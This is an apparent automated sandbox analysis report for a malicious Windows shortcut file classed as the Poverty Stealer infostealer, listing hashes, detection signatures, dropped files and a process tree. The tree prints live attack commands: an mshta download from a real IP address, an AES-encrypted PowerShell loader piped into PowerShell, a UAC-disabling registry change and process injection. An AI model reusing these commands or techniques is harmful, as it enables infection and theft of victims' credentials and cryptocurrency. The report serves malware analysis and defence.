Analysis
-
max time kernel
149s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-03-2024 02:01
Static task
static1
Behavioral task
behavioral1
Sample
05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
Resource
win10v2004-20240226-en
General
-
Target
05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
-
Size
1KB
-
MD5
53388b72e46cbc4a0110d3b6d0c0f930
-
SHA1
46881d02e2249c29ff212eb0bf15ce07828ae519
-
SHA256
05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28
-
SHA512
00646615c24cf58f28dfbd6a373f981f85738ec35ca91ef4816198fbc80573ce249083c7df60fdd0a63b42fa1e8011901555be8f5b8181490f2d767a085dc885
Malware Config
Extracted
http://91.92.251.35/Downloads/Ten/photoshop
Signatures
-
Detect Poverty Stealer Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/1728-136-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/1728-142-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/1728-143-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/1728-144-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exepowershell.exeflow pid process 22 4704 mshta.exe 40 1044 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exePhotoshop.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Photoshop.exe -
Executes dropped EXE 8 IoCs
Processes:
Photoshop.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exenmYIeCI7gcMH.exepid process 4088 Photoshop.exe 2300 7z.exe 2100 7z.exe 3680 7z.exe 4340 7z.exe 2404 7z.exe 4712 7z.exe 628 nmYIeCI7gcMH.exe -
Loads dropped DLL 6 IoCs
Processes:
7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepid process 2300 7z.exe 2100 7z.exe 3680 7z.exe 4340 7z.exe 2404 7z.exe 4712 7z.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
nmYIeCI7gcMH.exedescription pid process target process PID 628 set thread context of 1728 628 nmYIeCI7gcMH.exe RegSvcs.exe -
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2444 powershell.exe 2444 powershell.exe 2444 powershell.exe 1828 powershell.exe 1828 powershell.exe 1828 powershell.exe 1044 powershell.exe 1044 powershell.exe 1044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
Processes:
powershell.exepowershell.exepowershell.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exedescription pid process Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 1828 powershell.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeRestorePrivilege 2300 7z.exe Token: 35 2300 7z.exe Token: SeSecurityPrivilege 2300 7z.exe Token: SeSecurityPrivilege 2300 7z.exe Token: SeRestorePrivilege 2100 7z.exe Token: 35 2100 7z.exe Token: SeSecurityPrivilege 2100 7z.exe Token: SeSecurityPrivilege 2100 7z.exe Token: SeRestorePrivilege 3680 7z.exe Token: 35 3680 7z.exe Token: SeSecurityPrivilege 3680 7z.exe Token: SeSecurityPrivilege 3680 7z.exe Token: SeRestorePrivilege 4340 7z.exe Token: 35 4340 7z.exe Token: SeSecurityPrivilege 4340 7z.exe Token: SeSecurityPrivilege 4340 7z.exe Token: SeRestorePrivilege 2404 7z.exe Token: 35 2404 7z.exe Token: SeSecurityPrivilege 2404 7z.exe Token: SeSecurityPrivilege 2404 7z.exe Token: SeRestorePrivilege 4712 7z.exe Token: 35 4712 7z.exe Token: SeSecurityPrivilege 4712 7z.exe Token: SeSecurityPrivilege 4712 7z.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
cmd.exeforfiles.exepowershell.exemshta.exepowershell.exepowershell.exePhotoshop.execmd.exenmYIeCI7gcMH.exedescription pid process target process PID 3868 wrote to memory of 2276 3868 cmd.exe forfiles.exe PID 3868 wrote to memory of 2276 3868 cmd.exe forfiles.exe PID 2276 wrote to memory of 2444 2276 forfiles.exe powershell.exe PID 2276 wrote to memory of 2444 2276 forfiles.exe powershell.exe PID 2444 wrote to memory of 4704 2444 powershell.exe mshta.exe PID 2444 wrote to memory of 4704 2444 powershell.exe mshta.exe PID 4704 wrote to memory of 1828 4704 mshta.exe powershell.exe PID 4704 wrote to memory of 1828 4704 mshta.exe powershell.exe PID 1828 wrote to memory of 1044 1828 powershell.exe powershell.exe PID 1828 wrote to memory of 1044 1828 powershell.exe powershell.exe PID 1044 wrote to memory of 4088 1044 powershell.exe Photoshop.exe PID 1044 wrote to memory of 4088 1044 powershell.exe Photoshop.exe PID 1044 wrote to memory of 4088 1044 powershell.exe Photoshop.exe PID 4088 wrote to memory of 4964 4088 Photoshop.exe cmd.exe PID 4088 wrote to memory of 4964 4088 Photoshop.exe cmd.exe PID 4964 wrote to memory of 2916 4964 cmd.exe mode.com PID 4964 wrote to memory of 2916 4964 cmd.exe mode.com PID 4964 wrote to memory of 2300 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 2300 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 2100 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 2100 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 3680 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 3680 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 4340 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 4340 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 2404 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 2404 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 4712 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 4712 4964 cmd.exe 7z.exe PID 4964 wrote to memory of 3672 4964 cmd.exe attrib.exe PID 4964 wrote to memory of 3672 4964 cmd.exe attrib.exe PID 4964 wrote to memory of 628 4964 cmd.exe nmYIeCI7gcMH.exe PID 4964 wrote to memory of 628 4964 cmd.exe nmYIeCI7gcMH.exe PID 4964 wrote to memory of 628 4964 cmd.exe nmYIeCI7gcMH.exe PID 628 wrote to memory of 1728 628 nmYIeCI7gcMH.exe RegSvcs.exe PID 628 wrote to memory of 1728 628 nmYIeCI7gcMH.exe RegSvcs.exe PID 628 wrote to memory of 1728 628 nmYIeCI7gcMH.exe RegSvcs.exe PID 628 wrote to memory of 1728 628 nmYIeCI7gcMH.exe RegSvcs.exe PID 628 wrote to memory of 1728 628 nmYIeCI7gcMH.exe RegSvcs.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop2⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exestart mshta http://91.92.251.35/Downloads/Ten/photoshop3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -6⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Users\Admin\AppData\Roaming\Photoshop.exe"C:\Users\Admin\AppData\Roaming\Photoshop.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"8⤵
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\system32\mode.commode 65,109⤵PID:2916
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p125762329330388294023250819845 -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2100 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3680 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4712 -
C:\Windows\system32\attrib.exeattrib +H "nmYIeCI7gcMH.exe"9⤵
- Views/modifies file attributes
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe"nmYIeCI7gcMH.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"10⤵PID:1728
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:81⤵PID:3524
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD5e924b42def82a0dc711ba227d46b2328
SHA19b4f97aa90f59f3647b3f4e419f6195ff0ed34fd
SHA2565d2fcee8c6d15b34beb556f98700e4e8f207a06ba3e28efe7bc1f34784280623
SHA512f8c58207a8b8d9cfa8b190156aa24ee0ac908a2bc4a2d8f742b14a00f05bae88ac2b5fc5b5d20924e8f6ed98e277f16f93982c266926d670511fa4171426cbdc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
108KB
MD584dce6930241fbf55e8e49825151cbe0
SHA1ab2292208d4f88b58e9d09afbf3efd8ac1fc25aa
SHA256e9ae6f0cb6cf16e888820bec8a7789a450b04b223c680b72bd23b6a836d755f2
SHA5127abebca387f9242b33ea5d685d545d7f393e6247913ebe3d69a40e35335351fdaa401568834c1f47f3c7694e289e5573bccfd7df869e2d107ecec66d865df8a4
-
Filesize
163KB
MD5675407d2ece4c9224e725734b55f422e
SHA16a6016d63e1b82726840dfcc24249e635b4a966d
SHA256753eaa0f80e614e4e8bc83968904b1460f44070c97986c7a8ba6cdbd8030d70d
SHA512eaafb12eeed2a1e5157b92f2e8a175f46db78c0a0018baf4b6ed8a33d807e3dd8ab658fb4bdc5fba15f0fb5b21bd0aae43eec55848c045bbb84683700374f577
-
Filesize
689KB
MD5314c9eecec4e702f04cd34bf423cd24f
SHA123a24e0b875ebfe52062a85d5b5d4014ccef3c0b
SHA256c89c70f478a37253b0c7d363aafab4306b408a9f0a57432a788f763ba5c76880
SHA512ba005a5176611b9152016462eac733fd4b078ab1fe6823193ef8dcfbe3fb3b56243b67a1fa9beeff75f22263c6792cd6c1cc7af63a7feb39e1bdada4c922a2d5
-
Filesize
640KB
MD54fe97b925beae6dff3e2685a3b51d367
SHA1344297bda2f1fc7d62d6640ce9515f49600cfa7c
SHA2561e8949b7e730e67a269cf60a8580af9929badabc36d82844e8edea4c00cfac47
SHA512f4e4f00bc66cc3ce54aa5374a265a5efaf307757e9d2684da4b8ba2bde094abc17ef6f1ffc085ee9c8be8e61219ec2a3f69d7cc40ed50407047f0d7c5cc8930d
-
Filesize
877KB
MD5349dfa0f7c4f22d67f27a9abe8778c86
SHA14f5c8367f9b2292f5b7dc73bd4bdb4c022736e2f
SHA25616833c81c35fbac25e4c806f04617b944fbdaa466d251f08e4dff718a6412be5
SHA5123feb371de3c93136699b2f28b95845b468698a1d545892b6adc046c1454795e5a69acdc78c2f5a1135ec39a625297c374234df47089a928997d07c9cfa000497
-
Filesize
610KB
MD5876132fb73099103c8136040396737ca
SHA11d1f3e3cf995ac7824307a405b6083f640e4e33c
SHA25674ae2ec6f985cb2cf898a69c112f875bf93fc04621135aea029979abb3874b11
SHA512c96e67248ac8c7886050a8f8538af09cfabeb0ac1d66980af9a6a67b1ceb7a6b9e86cae1af4743c07d9b68c88a4e698a98caa61ff85296f6726dd6cc996c3025
-
Filesize
338KB
MD542d38af6d6bb7757a2af8662376fa9ec
SHA1128fa41b77bfe1eaf114a423db780046b262dbb3
SHA25657bc39dfecc8ca1a5986129249dadb967fd59227d699bc7f323d86fbdb0da8b5
SHA51274c71cc04d1a4cdb162122c3b4117ff6c4ea54f906400512430d881c97837b65f16bae8227c88326e3fc455ad548205c82cd120fc1ff8780412a1889d1ca7b08
-
Filesize
261KB
MD5f2bc75260c4dc6340e19b086f275f23b
SHA11d6776e6b83fa5096bb509065a1895b53d244e5a
SHA256779b54cb84e03c5c29618fc2a67b74e9b22c276e9e51c64940711c3463fea6a9
SHA51280e315dd87afff5846a565898168975a5d3dc85aecef70acd2e441dc90186a12c7618e245452ea159d15763d028df9d90abd197d6bff65c011c2602e38513eb5
-
Filesize
78KB
MD5db00b7f319494869fa521602dca18e7e
SHA11209ae2a93c3df5646bce2e4966bab908068b72c
SHA2568f03191124969b14ccfae574aeb717666143ab51a14672552755b528043bd305
SHA51245c7d844360d305a74243ee6f59850aacb99cd64d2ffc8912f6ac44907feb69a33e0f58cc7f94dc3ee582083ce9911b96d10f58afc3e448416fe3cc2f530c6d0
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
389KB
MD56cc2169083ae7a827b301871a41c30e8
SHA19acdaf07f63ccfd6ded504ae1a8d4a0a7652248d
SHA256367a10c0aac6e7bb56246c3f48e0a54be5f9deae4870c2d0bcac473faca7f2fa
SHA51220b5a54476dc7d18a2f2e338f86c092cf86a81f0cb2b62cb338b83820899428a78a4ccc1977b07c7be07be925477e54243868ec528a6e88bb6f92f0c758d9358
-
Filesize
515KB
MD552a996010e0bf508e3f42a33d551a184
SHA12dae988471bfe7598a981b997bf77eae59013fc1
SHA2563ce93351d9de6756ce9ff59d7830e905d9bee98f599107c0bdeb6374a47a84cb
SHA51274863d2b2abc30027ad7ee63cf518222d8934e4bc03312215b58d0921c180ff6416011c83ab5083855ec4cb1da395018e3d245c54ba6cc238b462cefc26e3787
-
Filesize
509KB
MD55f79b89dbaf23387caa818b0da7b8ea2
SHA13c38d94819331fd551c07048841cfe6ecbf29e18
SHA2567abc58d9dd3dee48f88629c8dcaf12e72a337f8bf1dbce59d464ab6ed698b726
SHA512a6381f3b0d3184ab098e9a40ca65dd1cec76cb7e0cfe13a5c2d188e4c8e6d077286c70a366ad6ffc7e7f68faa6240a730b7034fcaa00d1c1f0922e42c1edb8fc
-
Filesize
509KB
MD5763cb011f068f184a672e254d3ce3c39
SHA159eb148e6ad321cac5396e6a58c1528f7932befb
SHA256d25782f4a9573c40747458b6916e9332b34a349b3011ec85dd5d11a583a87105
SHA512530b8c0ad90b53f38cd56ffaf3766f33167c9922e55f8485ca87019275730c94dd6a84a1d9578163c45bae2743cf6981041f9ccc97ceb822f8d607f94a0c1d28
-
Filesize
102KB
MD5b0ee41dbf2f08951c13569cb754a532a
SHA1745aebfc11e334ef125efdb33330b75d9eab2919
SHA256d483b4b71895255dfea5b99406626b1599d3850f823f8d285e28e70006b96b54
SHA512aee14efeaa1f197416b6b119dd132f733d661ca01a8d585c9c70ff1743f876db1fefeeacab5d2857ab0d1f29029331fa3a2e27bed2af50dbb8db9bcc01183c59
-
Filesize
170KB
MD5f8e37275ce0eacb18f03972f25e95ed0
SHA1f2e7be3d5387e5a862717f73a2453d5357f11b15
SHA2563cbde6d0d924ce8379e07338017cbd3a38dbebaed78ed7f8ccf9b77a650739fc
SHA5128498058a38f5c349d5e0deca8efcba55b472aa1e3f538d415130c33f0ff1d3c569ef4987deb52312f93d6d1cb68fcd155f62e025ef325b49520a15e2b4e4dfa4
-
Filesize
370KB
MD591bb7523f03ef9b567ea4fa972f92f68
SHA19d2b617137b41a8bf909f2f4fe43ba5159747594
SHA2566fc67ba15759433a63eb34082a41be80394cdbad2b9a11934841227133ea62d6
SHA5127de69c574c312a46f17eadd2b80e8ff4206cd5c8c9a2f68ef18e867476053ed797ee583bbe2a28d9df13eb347de78f1bfc174f26235f522bb55da93b03933c11
-
Filesize
430KB
MD5a2599048150532ff6fe252cef66a0a9a
SHA1ae368eae4650fd3c75cfb4dbb0a53cd5331201bb
SHA25692f7cdf850de1f4b8fb7b96298f3dba0a590f80fd46020a08f710176c6ef5ba0
SHA512d6e4fa7c000ad4dcbe66d533a02cf5c1ff7d9410d14456b2c13df5506c3a05784bafb0e3aad2aeb35eafced1009be044654c41ea3d6cd9bdffe05821774f58a9
-
Filesize
1.1MB
MD5984b78026a296c4b0cc20f30ed30a8a1
SHA19ebe2b22c4e25edc0aa5370287864c2fc3bd5920
SHA256134e1b42d291f2b242432c4ad18679572924b476c651285c93b8981ed5b93235
SHA512ed2d5f81c90232a73bace1782b377cf070a16655ae9f86ca9e1659c6075132e4222c00a645b76aa10f1d63cc6cc07949c41254b6ef6c880b5448d01b9268e654
-
Filesize
491B
MD512b875e85a885c81bc04161e9df9151a
SHA17d9e32a575e487611abb182b4d89b1ab4f4e7a06
SHA25697e80e083ba83a031bb03097cd81d86708165cd7eb1c070782e6a7234de784a5
SHA5123ba38a4024287bcaeee208a1c0158fae73a86d5581cf566309985bbd204e810eb5fd099a1816a9326c9e25bb08a2da20f2a4884978eb4e4ed8a3762c1057d0ca
-
Filesize
345KB
MD5fe044a66ff6ed6c1fa522a53af2ca535
SHA178d7b327b5c0f0e93a2b4d6eae692aff4a50891b
SHA25671d81eec84ec62a6f977f50f5cd5db6e50f52675d2d1407db8412f1edf2721ab
SHA512ac2eda0d82979b812bfbdf6e61b88e88b3309edefb78690f3632a9e8967d9193beaf3147cf734756b84e5206b06b20f7ce48a236dd1e9ab8d2660e81c1ded2fc
-
Filesize
1.4MB
MD57b4b426a17e54627a6ee78305249508c
SHA1541889fd220c467a78a6e41c385e3646f09d2544
SHA256bb48d0fa09c72b3e019c19308b38337f96549787815be71faa9f5aa6243fb041
SHA5124bb6a902498eca598bfbb6eb4e0baa90e0c3560687decb58d5e73f987bb96e3901290a92152d75aa97216833e78547b75086e7358d8e212ab677f6efcd87e053
-
Filesize
3.0MB
MD5a8048bd6fc7d336d7f6e0fd6800da673
SHA1f28db14f2884ac1db0ce53a7ec7bee572541d902
SHA256d7414d6e34052bd4194ebf979a405af4e0d39b42b6d4d6ad31db85fd78dcc31d
SHA512570d1ac52dcb8f6c67983a4af99fece9f47e03beba83b9b2c95ce544f5b5f40c8c7e46019f5e106b258de2affee91988053dbab9e777e1c115d3803513eea066
-
Filesize
2.8MB
MD5e2220ef23d62310b8fb49798558fc356
SHA122eda8e818e6abb5deb1176a8caf5b0647d57a6b
SHA2566986d8faa363cc3adf4c6fc84ebb30361568b17267a79739f69941860481b78e
SHA512c169c76a87130072e9dfade83ccde4774091a1f8207b4190bb6daf4dc05483b6532eb4f5b0e04e26e9d6bd12e3ff88a79ab335b2a1871f28434ea3594b076930